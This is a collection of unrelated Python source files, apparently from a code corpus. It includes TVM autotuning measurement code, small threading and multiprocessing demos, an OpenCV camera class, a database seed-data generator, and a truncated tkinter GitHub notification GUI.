super(LocalRunner, self).__init__('', None, None, 0,
timeout=timeout, n_parallel=1,
number=number, repeat=repeat,
min_repeat_ms=min_repeat_ms,
cooldown_interval=cooldown_interval,
check_correctness=check_correctness)
self.tracker = None
self.server = None
def set_task(self, task):
# pylint: disable=import-outside-toplevel
from ...rpc.tracker import Tracker
from ...rpc.server import Server
self.task = task
tracker = Tracker('0.0.0.0', port=9000, port_end=10000, silent=True)
device_key = '$local$device$%d' % tracker.port
server = Server('0.0.0.0', port=9000, port_end=10000,
key=device_key,
use_popen=True, silent=True,
tracker_addr=(tracker.host, tracker.port))
self.key = device_key
self.host = tracker.host
self.port = tracker.port
super(LocalRunner, self).set_task(task)
return server, tracker
def _build_func_common(measure_input, check_gpu=None, cuda_arch=None, build_option=None):
"""Common part for building a configuration"""
target, task, config = measure_input
with target:
s, args = task.instantiate(config)
# check invalidity of template and code hash consistency
if not config.valid():
raise InstantiationError(config.errors)
opts = build_option or {}
if check_gpu: # Add verify pass to filter out invalid configs in advance.
opts["add_lower_pass"] = [(2, gpu_verify_pass(**check_gpu))]
if cuda_arch:
set_cuda_target_arch(cuda_arch)
# if target is vta, we need to use vta build
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
# pylint: disable=import-outside-toplevel
import vta
func = vta.build(s, args, target_host=task.target_host)
else:
with build_config(**opts):
func = build(s, args, target_host=task.target_host)
return func, tuple((get_const_tuple(x.shape), x.dtype) for x in args)
def _wrap_build_func(build_func):
"""
Wrap build_func to a function that can be used in measure.
Parameters
----------
build_func : The compilation function
We expect fcompile to contain an attr "output_format"
Returns
-------
wrapped_build_func : function
The wrapped build function
"""
if not hasattr(build_func, "output_format"):
raise AttributeError("Expect build_func to have the attribute output_format.")
output_format = build_func.output_format
def _wrapped(measure_input, tmp_dir, **kwargs):
"""
Wrapped build func.
Parameters
----------
measure_input: MeasureInput
The input of measurement
tmp_dir: str
The path of temporary directory to export generated library
"""
tic = time.time()
try:
filename = os.path.join(tmp_dir, "tmp_func_%0x.%s" % (
getrandbits(64), output_format))
# TODO(tvm-team) consider linline _build_func_common
func, arg_info = _build_func_common(measure_input, **kwargs)
func.export_library(filename, build_func)
except Exception as e: # pylint: disable=broad-except
return BuildResult(None, None, e, time.time() - tic)
return BuildResult(filename, arg_info, None, time.time() - tic)
return _wrapped
# func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms
def adaptive_evaluator(epsilon, remote, build_result, measure_input, ref_input, number, repeat, min_repeat_ms):
# print("####in adaptive evaluator###")
func = remote.load_module(os.path.split(build_result.filename)[1])
ctx = remote.context(str(measure_input.target), 0)
flop = measure_input.task.flop
# set input
if ref_input:
args = [nd.array(x, ctx=ctx) for x in ref_input]
else:
# create empty arrays on the remote device and copy them once.
# This can avoid some memory issues that make the measurement results unreliable.
args = [nd.empty(x[0], dtype=x[1], ctx=ctx) for x in build_result.arg_info]
args = [nd.array(x, ctx=ctx) for x in args]
ctx.sync()
# break the number*repeat into several batch
# print("number=%d, repeat=%d" % (number, repeat))
if repeat*number < 300: # no need to do adaptive evaluator
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms)
eva_res = time_f(*args)
costs = eva_res.results
else:
b_size = 50
costs = []
sum_num = 0
max_iter = number*repeat
pis = []
bi = 1
rep = 0
flag = True
while flag and sum_num<max_iter:
time_f = func.time_evaluator(
func.entry_name, ctx, number=b_size, repeat=1, min_repeat_ms=min_repeat_ms)
b_mean = time_f(*args).mean
# print("b_mean:" + str(b_mean))
costs.append(b_mean)
sum_num = sum_num + b_size
# calculate the flops of per batch: flop/time_mean_batch_i
pi = flop/b_mean
pis.append(pi)
pis_array = np.array(pis)
if len(pis_array) > 4: # remove the min and max to reduce variance
pis_array.sort()
pis_array = pis_array[1:-1]
# calculate the coefficient of variation
cv = pis_array.std()/pis_array.mean()
if bi > 2 and cv < epsilon:
# print("\nindex is %d, break at batch#%d, cv=%.10f, cost is %.8f." % (measure_input.config.index, bi, cv, b_mean))
flag = False
bi = bi + 1
return costs
def run_through_rpc(measure_input, build_result,
number, repeat, min_repeat_ms, cooldown_interval,
remote_args, ref_input=None, ref_output=None):
"""Run a generated library through rpc
Parameters
----------
measure_input: MeasureInput
The raw measure input
build_result: BuildResult
The result returned from Builder. This contains the path to the generated library.
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float
The cool down interval between two measurements
remote_args: Tuple
The argument for request_remote
ref_input: List of np.ndarray
The reference input used for checking correctness
ref_output: List of np.ndarray
The reference output used for checking correctness
"""
if isinstance(build_result, MeasureResult):
return build_result
tic = time.time()
errno = MeasureErrorNo.NO_ERROR
try:
# upload built module
remote = request_remote(*remote_args)
# Program the FPGA every single time when targeting VTA
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
# pylint: disable=import-outside-toplevel
from vta import program_fpga, reconfig_runtime
program_fpga(remote, None)
reconfig_runtime(remote)
remote.upload(build_result.filename)
epsilon = 0.1
costs = adaptive_evaluator(epsilon, remote, build_result, measure_input, ref_input, number, repeat, min_repeat_ms)
# clean up remote files
remote.remove(build_result.filename)
remote.remove(os.path.splitext(build_result.filename)[0] + '.so')
remote.remove('')
if len(costs) > 2: # remove largest and smallest value to reduce variance
costs = list(costs)
costs.sort()
costs = tuple(costs[1:-1])
# check correctness of output
if ref_output:
for expected, real in zip(ref_output, args):
if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
logger.warning("Wrong Answer!")
errno = MeasureErrorNo.WRONG_ANSWER
except TVMError as exc:
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
if "CUDA Source" in msg:
msg = msg[:msg.index("CUDA Source")]
costs = (RuntimeError(msg[:1024]),)
errno = MeasureErrorNo.RUNTIME_DEVICE
tstamp = time.time()
time.sleep(cooldown_interval)
return MeasureResult(costs, errno, tstamp - tic + build_result.time_cost, tstamp)
def request_remote(device_key, host=None, port=None, priority=1, timeout=60):
"""Request a remote session
Parameters
----------
device_key: string
The device key of registered device in tracker
host: host, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this session (units: second)
Returns
------
session: RPCSession
"""
# connect to the tracker
host = host or os.environ['TVM_TRACKER_HOST']
port = port or int(os.environ['TVM_TRACKER_PORT'])
tracker = _rpc.connect_tracker(host, port)
remote = tracker.request(device_key, priority=priority,
session_timeout=timeout)
return remote
def check_remote(target, device_key, host=None, port=None, priority=100, timeout=10):
"""
Check the availability of a remote device
Parameters
----------
target: Target
The wanted compilation target
device_key: string
device key of registered device in tracker
host: host, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this check (units: seconds).
Returns
-------
available: bool
True if can find available device
"""
def _check():
remote = request_remote(device_key, host, port, priority)
ctx = remote.context(str(target))
while not ctx.exist: # wait until we get an available device
pass
t = threading.Thread(target=_check,)
t.start()
t.join(timeout)
return not t.is_alive()
@tvm._ffi.register_func
def tvm_callback_cuda_compile(code):
"""use nvcc to generate ptx code for better optimization"""
curr_cuda_target_arch = AutotvmGlobalScope.current.cuda_target_arch
# e.g., target arch could be [
# "-gencode", "arch=compute_52,code=sm_52",
# "-gencode", "arch=compute_70,code=sm_70"
# ]
target = "fatbin" if isinstance(curr_cuda_target_arch, list) else "ptx"
ptx = nvcc.compile_cuda(code, target=target, arch=AutotvmGlobalScope.current.cuda_target_arch)
return ptx
def set_cuda_target_arch(arch):
"""set target architecture of nvcc compiler
Parameters
----------
arch: str or list
The argument of nvcc -arch. (e.g. "sm_51", "sm_62")
it can also be a count of gencode arguments pass to nvcc command line,
e.g., ["-gencode", "arch=compute_52,code=sm_52", "-gencode", "arch=compute_70,code=sm_70"]
"""
AutotvmGlobalScope.current.cuda_target_arch = arch
def gpu_verify_pass(**kwargs):
"""Verify the validity of a gpu kernel.
This pass will check memory usage and number of threads per block.
"""
def verify_pass(f, *_):
valid = tvm.tir.analysis.verify_gpu_code(f, kwargs)
if not valid:
raise InstantiationError("Skipped because of invalid gpu kernel")
return f
return tvm.tir.transform.prim_func_pass(verify_pass, opt_level=0) |
use_threadlocal.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import threading
# ThreadLocal:
local_school = threading.local()
def process_student():
# student:
std = local_school.student
print("Hello, %s (in %s)" % (std, threading.current_thread().name))
def process_thread(name):
# ThreadLocalstudent:
local_school.student = name
process_student()
t1 = threading.Thread(target=process_thread, args=("Alice",), name="Thread-A")
t2 = threading.Thread(target=process_thread, args=("Bob",), name="Thread-B")
t1.start()
t2.start()
t1.join()
t2.join()
|
maestro.py | from Sensor import *
from input import *
import threading
def main():
s = Sensor()
c = Communication_Device()
inThread = threading.Thread(target=c.read_data_stream, args=())
outThread = threading.Thread(target=s.output_data, args=("output.txt", "fancy-out.txt"))# s.output_data("output.txt", "fancy-out.txt")
inThread.start()
outThread.start()
main()
|
main.py | """
Parallel processes programming (not async)
Functions:
F1: C := A - B * (MA * MD)
F2: o := Min(MK * MM)
F3: T := (MS * MZ) * (W + X)
"""
from multiprocessing import Process
from contextlib import contextmanager
import os
import logging
from math_func import func1, func2, func3, make_sq_matrix, make_vector
@contextmanager
def verbose(det):
pid = os.getpid()
logging.info('Task %s in process %s started', det, pid)
yield
logging.info('Task %s in process %s finished', det, pid)
def task(det, size=4):
assert 1 <= det <= 3
assert size > 0
with verbose(det):
result = None
if det == 1:
ma = make_sq_matrix(size)
md = make_sq_matrix(size)
a = make_vector(size)
b = make_vector(size)
result = func1(a, b, ma, md)
elif det == 2:
mk = make_sq_matrix(size)
mm = make_sq_matrix(size)
result = func2(mk, mm)
elif det == 3:
w = make_vector(size)
x = make_vector(size)
ms = make_sq_matrix(size)
mz = make_sq_matrix(size)
result = func3(ms, mz, w, x)
if size < 8:
print('task %s: %s' % (det, result))
def main(sz):
assert sz > 0
ps = [Process(target=task, args=(d, sz)) for d in range(1, 4)]
for p in ps:
p.start()
for p in ps:
p.join()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
sz = 1000
main(sz)
|
opencv_gst_camera.py | import traitlets
import atexit
import cv2
import threading
import numpy as np
from .camera_base import CameraBase
class OpenCvGstCamera(CameraBase):
value = traitlets.Any()
# config
width = traitlets.Integer(default_value=816).tag(config=True)
height = traitlets.Integer(default_value=616).tag(config=True)
fps = traitlets.Integer(default_value=30).tag(config=True)
capture_width = traitlets.Integer(default_value=816).tag(config=True)
capture_height = traitlets.Integer(default_value=616).tag(config=True)
record_step = 0
record_flag = False
def __init__(self, *args, **kwargs):
self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)
super().__init__(self, *args, **kwargs)
path_video = "/home/kimbring2/Desktop/content_video.avi"
self.video_out = cv2.VideoWriter(path_video, cv2.VideoWriter_fourcc(*'DIVX'), 30, (816, 616))
try:
self.cap = cv2.VideoCapture(self._gst_str(), cv2.CAP_GSTREAMER)
re, image = self.cap.read()
if not re:
raise RuntimeError('Could not read image from camera.')
self.value = image
self.start()
except:
self.stop()
raise RuntimeError(
'Could not initialize camera. Please see error trace.')
atexit.register(self.stop)
def _capture_frames(self):
while True:
re, image = self.cap.read()
if re:
self.value = image
if self.record_flag == True:
self.video_out.write(image)
#cv2.imwrite("/home/kimbring2/Desktop/image_out_" + str(self.step) + ".jpg", image)
self.record_step += 1
else:
break
def _gst_str(self):
return 'nvarguscamerasrc sensor-mode=3 ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink' % (
self.capture_width, self.capture_height, self.fps, self.width, self.height)
def record_start(self):
self.record_flag = True
def record_stop(self):
self.record_flag = False
def start(self):
if not self.cap.isOpened():
self.cap.open(self._gst_str(), cv2.CAP_GSTREAMER)
if not hasattr(self, 'thread') or not self.thread.isAlive():
self.thread = threading.Thread(target=self._capture_frames)
self.thread.start()
def stop(self):
if hasattr(self, 'cap'):
self.cap.release()
if hasattr(self, 'thread'):
self.thread.join()
def restart(self):
self.stop()
self.start()
@staticmethod
def instance(*args, **kwargs):
return OpenCvGstCamera(*args, **kwargs)
|
database_seed.py | #!/usr/bin/python3.6
import threading
import multiprocessing
from functools import reduce
from time import sleep
from time import strftime
import mysql.connector
import json
from os.path import abspath, join, dirname
import random
import sys
import time
import itertools
import psycopg2
user_input = None
def func():
global user_input
user_input = input(":\t")
class TaurSeedGenerator:
def __init__(self, args):
self._is_psql = True
if self.main(args) == -1:
exit()
self.init_database_connection()
__SGBD = ['mysql', 'psql'] # ['mysql', 'sqlite', 'postgres']
# initialisation du fichier de configuration
u_config = {
"dbms": "mysql",
"db": None,
"user": None,
"password": None,
"host": "127.0.0.1",
"port": 3306,
"ignore": [],
"len_row": 20,
"equal": {},
"choice": {},
"combine": {},
"border": {
"_def": [0, 10000000]
},
"unit": {
"_def": 1
}
}
# initialisation des variables local
_db_cursor = _db_connector = None
queue = _finalseed = []
def appendExec(self, target=None, args=(), kwargs=None):
if kwargs is None:
kwargs = {}
if target:
idx = 0
while idx < len(self.queue):
if (not self.queue[idx]) or (not self.queue[idx].is_alive()):
if self.queue[idx]:
self.queue[idx].terminate()
process = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
self.queue[idx] = process
self.queue[idx].start()
break
idx = idx + 1
if idx == len(self.queue):
sleep(2)
self.appendExec(target, args, kwargs)
def waitAllFinish(self):
alldone = 0
while alldone < len(self.queue):
sleep(5)
alldone = 0
for process in self.queue:
if (not process) or process.exitcode or (not process.is_alive()):
alldone = alldone + 1
@staticmethod
def full_path(filename):
return abspath(join(dirname(__file__), filename))
def files(self):
return {
'first:homme': self.full_path('homme.taur'),
'first:femme': self.full_path('femme.taur'),
'last': self.full_path('prenom.taur'),
'word': self.full_path('words.taur'),
}
def get_name(self, val=0, typ=None):
selected = filename = None
if typ is not None:
typ = typ.lower()
if str(typ).__contains__('pseudo') \
or str(typ).__contains__('ickname') \
or str(typ).__contains__('prenom'):
val = 1
elif str(typ).__contains__('name') or str(typ).__contains__('nom'):
val = random.randint(2, 3)
if val == 0: # c'est un mot chercher
# selected = random.randint(0, 455000)
selected = random.randint(0, 53)
filename = self.files()['word']
elif val == 1: # c'est un prenom rechercher
# selected = random.randint(0, 88000)
selected = random.randint(0, 53)
filename = self.files()['last']
elif val == 2: # c'est un homme rechercher
# selected = random.randint(0, 12000)
selected = random.randint(0, 53)
filename = self.files()['first:homme']
elif val == 3: # c'est un prenom rechercher
# selected = random.randint(0, 42000)
selected = random.randint(0, 53)
filename = self.files()['first:femme']
with open(filename) as name_file:
c = 0
namer = ["", ""]
for line in name_file:
c = c + 1
namer.append(line.strip().split()[0])
if c > selected:
if val == 0:
if (c > 5) and not str(typ).__contains__('titre') and not str(typ).__contains__('title'):
return reduce(lambda x, y: str(x) + " " + str(y), namer[-7:])
return reduce(lambda x, y: str(x) + " " + str(y), namer[-2:])
else:
return namer[-1]
return "taur string" # Return empty string if file is empty
@staticmethod
def get_doc():
res = "*" * 10 + "Taur seed generator" + "*" * 10
res = res + "\n sgbd\tpour specifier le gestionaire de base de donnee. NB: si ommit 'mysql' sera utiliser"
res = res + "\n -u\t\tpour specifier le nom de l'utilisateur de la base de donnee. ce parametre est requis"
res = \
res + "\n -h\t\tpour specifier l'address hote de la base de donnee. NB:si ommit 'localhost' sera utiliser"
res = res + "\n -p\t\tpour specifier le mot de passe de l'utilisateur de la base de donnee."
res = res + "\n -db\tpour specifier la base de donnee a utiliser. ce parametre est requis"
res = res + "\n -l\t\tpour specifier la limite de donnee a inserer. sit omit la limit sera de 20"
res = res + "\n -i\t\tpour specifier la liste des tables a ignore pendant l'insertion."
res = res + "\n\t\tsi ce parametre est ommit, toute les tables soront modifier."
res = res + "\n\t\tNB: on souhaite souvant ignorer les tables detier pour les frameworks"
res = res + "\n\nexample:\n\tpython3 t_g_seed.py ? "
res = res + "\n\tpython3 t_g_seed.py -conf ~/config.json"
res = res + "\n\tpython3 t_g_seed.py -o -conf ./config.json"
res = \
res + "\n\nexample configuration:" + \
'\n{\
\n\t"dbms": "mysql",\
\n\t"db": test,\
\n\t"user": test,\
\n\t"password": test,\
\n\t"host": "127.0.0.1",\
\n\t"port": 3306,\
\n\t"ignore": ["SequelizeMeta"],\
\n\t"len_row": 50,\
\n\t"equal": { \
\n\t "your_colone": 0\
\n\t "your_colone": "test"\
\n\t},\
\n\t"choice": { \
\n\t "your_colone": ["val1", "val2", "val3"]\
\n\t "your_colone": [1, 5, 3]\
\n\t},\
\n\t"combine": { \
\n\t "your_colone":{ \
\n\t "val":[1,2,3,5,5,6,7,8,9]\
\n\t "join":"-"\
\n\t }\
\n\t "your_colone":{ \
\n\t "val":[[1,2],[3],[5],[5,6,7],8,9]\
\n\t "join":[]\
\n\t }\
\n\t},\
\n\t"border": {\
\n\t "_def": [0, 10000000]\
\n\t "your_colone": [5000, 10000000]\
\n\t},\
\n\t"unit": {\
\n\t "_def": 1\
\n\t "your_colone": 500\
\n\t}\
\n} '
res = res + "\n\nNB: tout autre parametre sera ignorer\n"
return res + "*" * 39
def main(self, args):
sleep(1)
print(args)
if args.__len__() <= 1:
return self.loadConfig()
if args.__contains__('?'):
print(self.get_doc())
return -1
if args.__contains__('-conf'):
try:
idx = args.index('-conf')
if len(args) > idx + 1:
return self.loadConfig(args[idx + 1] or None)
else:
print("Erreur: parametre de commande incorrecte")
except Exception as e:
print(e)
print("Erreur: fichier de configuration incorrecte ou introuvavble")
return 0
@staticmethod
def get_arg_value(idx, args):
arg = str(args[idx]).split('"')
if arg.__len__() == 3:
arg = arg[1]
else:
arg = arg[0].split("'")
if arg.__len__() == 3:
arg = arg[1]
else:
arg = arg[0]
return arg
def special_reduce(self, stri):
if type(self.u_config['combine'][stri]['join']) is str:
return lambda _x, y: str(_x) + self.u_config['combine'][stri]['join'] + str(y)
if type(self.u_config['combine'][stri]['join']) is list:
return lambda _x, y: (_x if type(_x) is list else [_x]) + self.u_config['combine'][stri]['join'] + (
y if type(y) is list else [y])
return lambda _x, y: _x + self.u_config['combine'][stri]['join'] + y
@staticmethod
def generate(val, ln):
if val == 0: # generer un nombre
return random.randint(0, 10 ** ln)
elif val == 1: # generer une date
return strftime('%Y-%m-%d %H:%M:%S')
elif val == 3: # generer une chaine de charactere
pass
def get_config(self, strin, who=1):
if self.u_config['equal'].__contains__(strin):
return self.u_config['equal'][strin]
if self.u_config['choice'].__contains__(strin):
return random.choice(self.u_config['choice'][strin])
if self.u_config['combine'].__contains__(strin):
nb = random.randint(2, len(self.u_config['combine'][strin]['val']))
a = list(itertools.combinations(self.u_config['combine'][strin]["val"], nb))
return reduce(self.special_reduce(strin), random.choice(a))
if who == 0:
return self.get_name(0, strin)
if self.u_config['unit'].__contains__(strin):
unit_key = self.u_config['unit'][strin]
else:
unit_key = self.u_config['unit']['_def']
if self.u_config['border'].__contains__(strin):
a = round(self.u_config['border'][strin][0] / unit_key)
b = round(self.u_config['border'][strin][1] / unit_key)
return unit_key * random.randint(a, b)
else:
a = round(self.u_config['border']['_def'][0] / unit_key)
b = round(self.u_config['border']['_def'][1] / unit_key)
return unit_key * random.randint(a, b)
def addseed(self, tb, args, fin):
finalseed = []
idx = len(finalseed)
finalseed.append([tb, [], [], None])
print("add seed table", tb)
for pos in range(self.u_config['len_row']):
finalseed[idx][1].append({})
for arg in args:
if arg[3] == "PRI":
typ = arg[1][:3]
if finalseed[idx][3] is None:
finalseed[idx][3] = arg[0] # on affecte cette cle primaire al la table
if pos == 0:
if typ == 'var':
finalseed[idx][1][pos][arg[0]] = self.get_name(0, arg[0])
elif typ == 'dat':
finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
else:
finalseed[idx][1][pos][arg[0]] = 1
else:
if typ == 'dat':
finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
else:
old = finalseed[idx][1][pos - 1][arg[0]]
finalseed[idx][1][pos][arg[0]] = old + str(1) if type(old) is str else old + 1
elif arg[3] == "MUL":
# cle secondaire detecter
if not finalseed[idx][2].__contains__(arg[0]):
finalseed[idx][2].append(
arg[0]) # on ajoute cette cle secondaire a la table si elle nexiste pas deja
finalseed[idx][1][pos][arg[0]] = random.randint(1, self.u_config['len_row'])
elif arg[3] == "UNI":
typ = arg[1][:3]
if pos == 0:
if typ == 'var':
finalseed[idx][1][pos][arg[0]] = self.get_config(arg[0], 0)
elif typ == 'dat':
finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
else:
finalseed[idx][1][pos][arg[0]] = 1
else:
if typ == 'dat':
finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
else:
old = finalseed[idx][1][pos - 1][arg[0]]
finalseed[idx][1][pos][arg[0]] = old + 1 if type(old) is int else old + str(1)
else:
typ = arg[1][:3]
if typ == 'var':
finalseed[idx][1][pos][arg[0]] = self.get_config(arg[0], 0)
elif (typ == 'boo') | (typ == 'BOO'):
finalseed[idx][1][pos][arg[0]] = random.choice([True, False])
elif typ == 'dat':
finalseed[idx][1][pos][arg[0]] = strftime('%Y-%m-%d %H:%M:%S')
else:
finalseed[idx][1][pos][arg[0]] = self.get_config(arg[0])
fin.append(finalseed[0])
def init_database_connection(self):
try:
if self.u_config['dbms'] == 'mysql':
self._db_connector = mysql.connector.connect(
host=self.u_config['host'],
port=self.u_config['port'],
database=self.u_config['db'],
user=self.u_config['user'],
passwd=self.u_config['password']
)
self._is_psql = False
else:
self._db_connector = psycopg2.connect(
host=self.u_config['host'],
port=self.u_config['port'],
database=self.u_config['db'],
user=self.u_config['user'],
password=self.u_config['password']
)
except Exception as e:
sleep(1)
print(e)
print("Erreur Taur n'arrive pas a se connecter avec les parametres fourni.")
print("\t{\n\t\tsgbd :\t\t'" + str(self.u_config['dbms']) + "'\n\t\t", end=' ')
print("user :\t\t'" + str(self.u_config['user']) + "'\n\t\t", end=' ')
print("password :\t'" + str(self.u_config['password']) + "'\n\t\t", end=' ')
print("host :\t\t'" + str(self.u_config['host']) + "'\n\t\t", end=' ')
print("database :\t'" + str(self.u_config['db']) + "'\n\t}\n\n", end=' ')
exit()
print("connection au sgbd '" + str(self.u_config['dbms']) + "' reussi")
self._db_cursor = self._db_connector.cursor()
print('*' * 8 ** 3, end='\n\n')
if self._is_psql:
self._db_cursor.execute("SELECT \
table_schema || '.' || table_name \
FROM \
information_schema.tables \
WHERE \
table_type = 'BASE TABLE' \
AND \
table_schema NOT IN ('pg_catalog', 'information_schema');")
else:
self._db_cursor.execute("SHOW TABLES")
table_list = []
for x in self._db_cursor:
print(x[0], end=', ')
table_list.append(x[0])
self._db_cursor.close()
print("\nList des tables trouver:\n\t", end=' ')
print(table_list)
if type(self.u_config['ignore']) is str:
if table_list.__contains__(self.u_config['ignore']):
table_list.remove(self.u_config['ignore'])
elif type(self.u_config['ignore']) is list:
for ignore in self.u_config['ignore']:
if table_list.__contains__(ignore):
table_list.remove(ignore)
sleep(2)
self._db_cursor = self._db_connector.cursor()
_finaltable = []
''' table final contient le nom de la table, la liste de colon
il sera representer comme suit:
[('table0',[('colonne1','type','isMul') # mul est mis ici pour les cles secondaires])]
'''
print("\n\nListe final des tables a modifier", table_list)
print("preparation de l'insertion")
manager = multiprocessing.Manager()
finalseed = manager.list()
for table in table_list:
assert isinstance(table, str)
# self._db_cursor.execute("SHOW CREATE TABLE " + el)
if self._is_psql:
self._db_cursor.execute("SELECT * \
FROM information_schema.columns \
WHERE table_schema = " + table)
else:
self._db_cursor.execute("SHOW COLUMNS FROM " + table)
_finaltable.append((table, []))
flen = len(_finaltable)
for nxt in self._db_cursor:
_finaltable[flen - 1][1].append(list(nxt))
self.appendExec(self.addseed, (table, _finaltable[flen - 1][1], finalseed))
self.waitAllFinish()
self._finalseed = finalseed
print()
print("seed a inserer")
print(self._finalseed)
print('verification de cle secondaire')
remplacement = True
idx = 0
count = 0 # pour verifier l'indexation recurssive
fln = len(self._finalseed)
fln2 = fln ** 3
precedent_primarys_key = []
while (remplacement | (idx < fln)) & (count < fln2):
remplacement = False
precedent_primarys_key.append((self._finalseed[idx][0], self._finalseed[idx][3]))
ln = len(self._finalseed[idx][2])
if ln != 0:
for foreign_id in range(ln):
if not self.string_contain_tuple_in_array(self._finalseed[idx][2][foreign_id],
precedent_primarys_key):
_el = self._finalseed[idx]
self._finalseed.remove(_el)
self._finalseed.append(_el)
remplacement = True
break
idx = idx + 1
if remplacement:
print("# on reinitialise les compteur: table: " + str(self._finalseed[fln - 1][0]))
print(list(map(lambda _x: _x[0], self._finalseed)))
count = count + 1
precedent_primarys_key = []
idx = 0
if count >= fln2:
print("\n\n**********************\n\tErreur: indexsation recurssive")
print("\tverifier les cles secondaire\n*******************\n")
exit()
print("\n\ncommencer l'insertion?\n")
print("vous avez 30 secondes pour repondre y ou o pour oui et tout autres lettre pour nom")
res = self.get_input(30)
if (res == 'y') | (res == 'Y') | (res == 'O') | (res == 'o'):
for table in self._finalseed:
into = reduce(lambda _x, _y: str(_x) + ", " + str(_y), table[1][0].keys())
valu = list(map(lambda _s: tuple(_s.values()), table[1]))
print(into)
print(valu)
sql = "INSERT INTO " + str(table[0]) + " (" + into + ") VALUES (" + reduce(lambda _x, y: _x + "%s,",
into.split(', '), "")[
:-1] + ")"
self._db_cursor.executemany(sql, valu)
self._db_connector.commit()
else:
if res is None:
print("delai depasser")
print('\n' * 2, "bye!", end='\n')
exit()
@staticmethod
def get_input(timeout=10):
global user_input
user_input = None
th = threading.Thread(target=func)
th.start()
count = 0
while count < timeout:
if not th.is_alive():
break
count = count + 1
time.sleep(1)
th._delete()
return user_input
@staticmethod
def string_contain_tuple_in_array(string, arr_tuple):
string = string.lower()
for tupl in arr_tuple:
_table_name = tupl[0][:-1].lower()
if tupl[0][-1] == 's'.lower():
_table_name = tupl[0][:-1].lower()
_primary_key = tupl[1].lower()
lns = len(string)
lnt = len(_table_name)
lnp = len(_primary_key)
if string.__contains__(_table_name) and string.__contains__(_primary_key) and (
lnp + lnt <= lns < lnp + lnt + 2) and (string.index(_table_name) == 0) and (
string.index(_primary_key) == lns - lnp):
return True
return False
def loadConfig(self, file_path='./config.seed.json'):
try:
if file_path[-5:] != '.json':
raise Exception('veuillez le fichier de configuration doit etre un fichier extenstion json')
json_file = open(str(file_path))
_config = json.load(json_file)
if _config.__contains__('dbms'):
self.u_config['dbms'] = _config['dbms']
if _config.__contains__('user'):
self.u_config['user'] = _config['user']
else:
raise Exception('utilisateur nom defini')
if _config.__contains__('password'):
self.u_config['password'] = _config['password']
if _config.__contains__('process_number'):
for proc in range(_config['process_number']):
self.queue.append(None)
else:
for proc in range(2):
self.queue.append(None)
if _config.__contains__('host'):
self.u_config['host'] = _config['host']
if _config.__contains__('port'):
self.u_config['port'] = _config['port']
elif self.u_config['dbms'] == 'psql':
self.u_config['port'] = 5432
if _config.__contains__('db'):
self.u_config['db'] = _config['db']
else:
raise Exception('la base de donnee n\'est pas specifier')
if _config.__contains__('len_row'):
self.u_config['len_row'] = _config['len_row']
else:
print('le nombre de colonne n\'a pas ete specifier, 50 sera utiliser par default')
if _config.__contains__('ignore'):
self.u_config['ignore'] = _config['ignore']
if _config.__contains__('equal'):
self.u_config['equal'] = _config['equal']
if _config.__contains__('choice'):
self.u_config['choice'] = _config['choice']
if _config.__contains__('combine'):
for key in _config['combine']:
if _config['combine'][key].__contains__('val') and (type(_config['combine'][key]['val']) is list):
self.u_config['combine'][key] = _config['combine'][key]
if not _config['combine'][key].__contains__('join'):
self.u_config['combine'][key]['join'] = " "
if _config.__contains__('border'):
self.u_config['border'] = _config['border']
if not _config['border'].__contains__('_def'):
self.u_config['unit']['_def'] = 1
if _config.__contains__('unit'):
self.u_config['unit'] = _config['unit']
if not _config['unit'].__contains__('_def'):
self.u_config['unit']['_def'] = 1
return 0
except Exception as e:
print(e)
return -1
if __name__ == "__main__":
TaurSeedGenerator(sys.argv)
|
gui.py | import tkinter as tk
import gmail
import settings
import threading
from datetime import datetime
from github_interface import GithubInterface
def change_button_states(active):
state = 'normal' if active else 'disabled'
refresh_button.config(state=state)
send_button.config(state=state)
def log_message(text):
message.configure(state='normal')
time = datetime.now()
time_trimmed = time.strftime('%Y-%m-%d %H:%M:%S')
message.insert(tk.END, f"{time_trimmed} {text}\n")
message.configure(state='disabled')
message.see(tk.END)
def async_github_fetch():
github.fetch_updated_repos()
for repo in github.repos:
text = f"{repo.name} ({len(repo.gazers)} new gazers)"
listbox.insert('end', text)
log_message("Done fetching repositories!")
change_button_states(True)
def refresh_repos():
change_button_states(False)
log_message("Fetching repos...")
listbox.delete(0, 'end')
github_fetch_thread = threading.Thread(target=async_github_fetch)
github_fetch_thread.start()
def async_send_email():
selected = listbox.curselection()
for index, repo in enumerate(github.repos):
if index not in selected:
continue
